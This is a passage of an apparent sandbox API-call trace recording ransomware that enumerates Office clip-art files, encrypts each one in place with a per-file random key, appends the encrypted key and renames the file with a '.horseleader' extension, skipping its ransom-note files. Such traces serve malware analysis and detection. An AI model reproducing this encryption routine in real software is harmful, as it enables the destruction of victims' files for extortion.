ftCreationTime.dwLowDateTime=0xbf688200, ftCreationTime.dwHighDateTime=0x1bd4d58, ftLastAccessTime.dwLowDateTime=0x5f586430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbf688200, ftLastWriteTime.dwHighDateTime=0x1bd4d58, nFileSizeHigh=0x0, nFileSizeLow=0x2b32, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD20013_.WMF", cAlternateFileName="")) returned 1 [0253.364] 
lstrcmpiW (lpString1="BD20013_.WMF", lpString2="Windows") returned -1 [0253.364] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 67 [0253.364] StrStrIW (lpFirst="BD20013_.WMF", lpSrch=".horseleader") returned 0x0 [0253.364] lstrcmpW (lpString1="BD20013_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.364] lstrcmpW (lpString1="BD20013_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.364] lstrlenW (lpString=".testttjffg") returned 11 [0253.364] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.364] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.364] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.365] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.365] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 67 [0253.366] StrStrW (lpFirst="BD20013_.WMF", lpSrch=".txt") returned 0x0 [0253.366] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=11058) returned 1 [0253.366] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2b32, lpOverlapped=0x0) returned 1 [0253.368] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd4ce, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.368] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2b32, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2b32, lpOverlapped=0x0) returned 1 [0253.368] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.369] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.369] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.369] CloseHandle (hObject=0x158) returned 1 [0253.369] GetProcessHeap () returned 0x780000 [0253.369] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.369] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF.horseleader") returned 79 [0253.369] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf.horseleader")) returned 1 [0253.370] GetProcessHeap () returned 0x780000 [0253.370] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.370] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b147c00, ftCreationTime.dwHighDateTime=0x1bd4b34, ftLastAccessTime.dwLowDateTime=0x519c9550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8b147c00, ftLastWriteTime.dwHighDateTime=0x1bd4b34, nFileSizeHigh=0x0, nFileSizeLow=0x30e8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00008_.WMF", cAlternateFileName="")) returned 1 [0253.370] lstrcmpiW (lpString1="BL00008_.WMF", lpString2="Windows") returned -1 [0253.370] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 67 [0253.370] StrStrIW (lpFirst="BL00008_.WMF", lpSrch=".horseleader") returned 0x0 [0253.370] lstrcmpW (lpString1="BL00008_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.370] lstrcmpW (lpString1="BL00008_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.370] lstrlenW (lpString=".testttjffg") returned 11 [0253.370] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.371] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.371] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.371] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00008_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.372] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 67 [0253.372] StrStrW 
(lpFirst="BL00008_.WMF", lpSrch=".txt") returned 0x0 [0253.372] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=12520) returned 1 [0253.372] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x30e8, lpOverlapped=0x0) returned 1 [0253.374] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffcf18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.375] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x30e8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x30e8, lpOverlapped=0x0) returned 1 [0253.375] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.375] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.375] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.375] CloseHandle (hObject=0x158) returned 1 [0253.375] GetProcessHeap () returned 0x780000 [0253.375] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.375] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF.horseleader") returned 79 [0253.375] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft 
office\\clipart\\pub60cor\\bl00008_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00008_.wmf.horseleader")) returned 1 [0253.376] GetProcessHeap () returned 0x780000 [0253.377] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.377] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x851e9b00, ftCreationTime.dwHighDateTime=0x1bd4b34, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x851e9b00, ftLastWriteTime.dwHighDateTime=0x1bd4b34, nFileSizeHigh=0x0, nFileSizeLow=0x265a, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00012_.WMF", cAlternateFileName="")) returned 1 [0253.377] lstrcmpiW (lpString1="BL00012_.WMF", lpString2="Windows") returned -1 [0253.377] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 67 [0253.377] StrStrIW (lpFirst="BL00012_.WMF", lpSrch=".horseleader") returned 0x0 [0253.377] lstrcmpW (lpString1="BL00012_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.377] lstrcmpW (lpString1="BL00012_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.377] lstrlenW (lpString=".testttjffg") returned 11 [0253.377] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.377] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.377] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.377] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00012_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.378] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 67 [0253.378] StrStrW (lpFirst="BL00012_.WMF", lpSrch=".txt") returned 0x0 [0253.378] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=9818) returned 1 [0253.379] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x265a, lpOverlapped=0x0) returned 1 [0253.380] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd9a6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.381] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x265a, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x265a, lpOverlapped=0x0) returned 1 [0253.381] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.381] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.381] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.381] CloseHandle (hObject=0x158) returned 1 [0253.381] GetProcessHeap () returned 0x780000 
[0253.381] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.381] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF.horseleader") returned 79 [0253.381] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00012_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00012_.wmf.horseleader")) returned 1 [0253.382] GetProcessHeap () returned 0x780000 [0253.383] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.383] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1c98800, ftCreationTime.dwHighDateTime=0x1bd4b2b, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe1c98800, ftLastWriteTime.dwHighDateTime=0x1bd4b2b, nFileSizeHigh=0x0, nFileSizeLow=0x1eb6, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00045_.WMF", cAlternateFileName="")) returned 1 [0253.383] lstrcmpiW (lpString1="BL00045_.WMF", lpString2="Windows") returned -1 [0253.383] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 67 [0253.383] StrStrIW (lpFirst="BL00045_.WMF", lpSrch=".horseleader") returned 0x0 [0253.383] lstrcmpW (lpString1="BL00045_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.383] lstrcmpW (lpString1="BL00045_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.383] lstrlenW (lpString=".testttjffg") returned 11 [0253.383] StrStrW 
(lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.383] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.383] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.383] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00045_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.384] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 67 [0253.384] StrStrW (lpFirst="BL00045_.WMF", lpSrch=".txt") returned 0x0 [0253.384] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7862) returned 1 [0253.384] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1eb6, lpOverlapped=0x0) returned 1 [0253.386] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe14a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.386] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1eb6, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1eb6, lpOverlapped=0x0) returned 1 [0253.386] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.386] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.387] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.387] CloseHandle (hObject=0x158) returned 1 [0253.387] GetProcessHeap () returned 0x780000 [0253.387] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.387] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF.horseleader") returned 79 [0253.387] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00045_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00045_.wmf.horseleader")) returned 1 [0253.388] GetProcessHeap () returned 0x780000 [0253.388] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.388] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a40fd00, ftCreationTime.dwHighDateTime=0x1bd4b27, ftLastAccessTime.dwLowDateTime=0x519c9550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9a40fd00, ftLastWriteTime.dwHighDateTime=0x1bd4b27, nFileSizeHigh=0x0, nFileSizeLow=0x3f4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00098_.WMF", cAlternateFileName="")) returned 1 [0253.388] lstrcmpiW (lpString1="BL00098_.WMF", lpString2="Windows") returned -1 [0253.388] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 67 [0253.388] StrStrIW (lpFirst="BL00098_.WMF", lpSrch=".horseleader") returned 0x0 [0253.389] lstrcmpW (lpString1="BL00098_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.389] lstrcmpW (lpString1="BL00098_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.389] lstrlenW (lpString=".testttjffg") returned 11 [0253.389] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.389] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.389] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.389] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.390] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 67 [0253.390] StrStrW (lpFirst="BL00098_.WMF", lpSrch=".txt") returned 0x0 [0253.390] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1012) returned 1 [0253.390] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3f4, lpOverlapped=0x0) returned 1 [0253.391] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffc0c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.391] WriteFile (in: hFile=0x158, 
lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3f4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3f4, lpOverlapped=0x0) returned 1 [0253.392] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.392] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.392] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.392] CloseHandle (hObject=0x158) returned 1 [0253.392] GetProcessHeap () returned 0x780000 [0253.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.392] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF.horseleader") returned 79 [0253.392] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf.horseleader")) returned 1 [0253.393] GetProcessHeap () returned 0x780000 [0253.393] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.393] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x888a3600, ftCreationTime.dwHighDateTime=0x1bd4ae4, 
ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x888a3600, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x370, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00105_.WMF", cAlternateFileName="")) returned 1 [0253.393] lstrcmpiW (lpString1="BL00105_.WMF", lpString2="Windows") returned -1 [0253.393] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 67 [0253.393] StrStrIW (lpFirst="BL00105_.WMF", lpSrch=".horseleader") returned 0x0 [0253.393] lstrcmpW (lpString1="BL00105_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.393] lstrcmpW (lpString1="BL00105_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.393] lstrlenW (lpString=".testttjffg") returned 11 [0253.393] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.393] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.393] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.393] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00105_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.395] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 67 [0253.395] StrStrW (lpFirst="BL00105_.WMF", lpSrch=".txt") returned 0x0 [0253.395] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: 
